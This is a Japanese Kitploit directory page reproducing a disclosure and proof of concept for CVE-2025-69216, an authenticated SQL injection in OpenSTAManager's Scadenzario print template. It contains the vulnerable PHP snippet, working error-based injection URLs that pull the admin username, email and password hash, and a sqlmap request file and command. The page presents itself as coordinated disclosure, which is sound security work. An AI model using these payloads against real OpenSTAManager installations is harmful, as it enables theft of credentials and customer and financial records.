Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-69216 — CVE-2025-69216の概念実証リポジトリ。OpenSTAManagerのScadenzario印刷テンプレートの認証済みSQLインジェクションで、エラーベースおよびブラインドSQLiを介して管理者資格情報とデータベース内容の抽出を可能にする。 | Kitploit
ツール/GitHubGitHub/lukasz-rybak/cve-2025-69216
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育データベースセキュリティ
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

CVE-2025-69216の概念実証リポジトリ。OpenSTAManagerのScadenzario印刷テンプレートの認証済みSQLインジェクションで、エラーベースおよびブラインドSQLiを介して管理者資格情報とデータベース内容の抽出を可能にする。

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-69216: OpenSTAManager の Scadenzario 印刷テンプレートにおける SQL インジェクション

概要

フィールド詳細
CVE IDCVE-2025-69216
重要度HIGH
アドバイザリアドバイザリを表示
発見者Lukasz Rybak

影響を受ける製品

  • devcode-it/openstamanager (バージョン: <= 2.9.8)

CWE 分類

  • CWE-89: SQL コマンドで使用される特殊要素の不適切な無害化('SQL インジェクション')

詳細

要約

OpenSTAManager の Scadenzario(支払予定表)印刷テンプレートにおける認証済み SQL インジェクション脆弱性により、認証された任意のユーザーが、管理者の認証情報、顧客情報、財務記録を含むデータベース内の機密データを抽出できます。この脆弱性により、エラーベースの SQL インジェクション手法を通じてデータベースへの完全な読み取りアクセスが可能になります。

詳細

この脆弱性は templates/scadenzario/init.php の46行目に存在し、id_anagrafica パラメータが適切なサニタイズなしに SQL クエリへ直接連結されます:

脆弱なコード:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

get() 関数は、検証なしに GET/POST パラメータからユーザー入力を取得します。パラメータ値は、アプリケーションの prepare() サニタイズ関数を使用せずに文字列連結を使用して SQL クエリ文字列に直接埋め込まれるため、SQL インジェクション攻撃が可能になります。

根本原因:

  • 入力サニタイズのための prepare() 関数の未使用
  • SQL クエリ構築における直接の文字列連結
  • 入力検証または型チェックの欠如

影響を受けるエンドポイント:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

影響を受けるファイル:

  • templates/scadenzario/init.php (46行目) - 主要な脆弱性
  • templates/scadenzario/init.php (34行目、40行目) - 日付パラメータにおける同様のパターン
  • pdfgen.php - テンプレートレンダリングのエントリポイント

PoC(概念実証)

前提条件

  • 有効な認証済みセッション(任意のユーザーロール)

悪用手順

1. 脆弱性の確認 - 基本構文エラーテスト:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

SQL 構文エラーがアプリケーションのレスポンスに表示される

image

2. データベースバージョンの抽出 - エラーベース SQLi:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

結果: ~8.3.0~(MySQL バージョン)

image

3. データベース名の抽出:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

結果: ~openstamanager~

image

4. 管理者ユーザー名の抽出:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

結果: ~admin~ image


5. 管理者メールアドレスの抽出:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

結果: 管理者のメールアドレス

image

6. パスワードハッシュの抽出(部分 - XPATH 31文字制限):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

結果: bcrypt パスワードハッシュ

image

7. SQLMap による自動化された悪用:

リクエストファイル sqli_osm.req を作成:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

SQLMap を実行:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

SQLMap が確認したインジェクション種別:

  • ✅ ブールベースのブラインド SQL インジェクション
  • ✅ エラーベースの SQL インジェクション(MySQL >= 5.6 GTID_SUBSET)
  • ✅ 時間ベースのブラインド SQL インジェクション(SLEEP)
image

影響

影響を受けるユーザー:

  • ✅ すべての認証済みユーザー - 有効な認証情報を持つ任意のユーザーがこの脆弱性を悪用できます
  • ✅ 低権限ユーザー - 最小限の権限しか持たないユーザーでも管理者レベルのデータにアクセスできます
  • ✅ すべての OpenSTAManager インストール - この脆弱性は最新の master ブランチに存在します

帰属

Łukasz Rybak によって報告されました

参照

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

免責事項

この CVE は、調整された脆弱性開示の慣行に従って責任を持って開示されました。ここで提供される情報は、教育および防御目的のみを目的としています。

ツールをダウンロード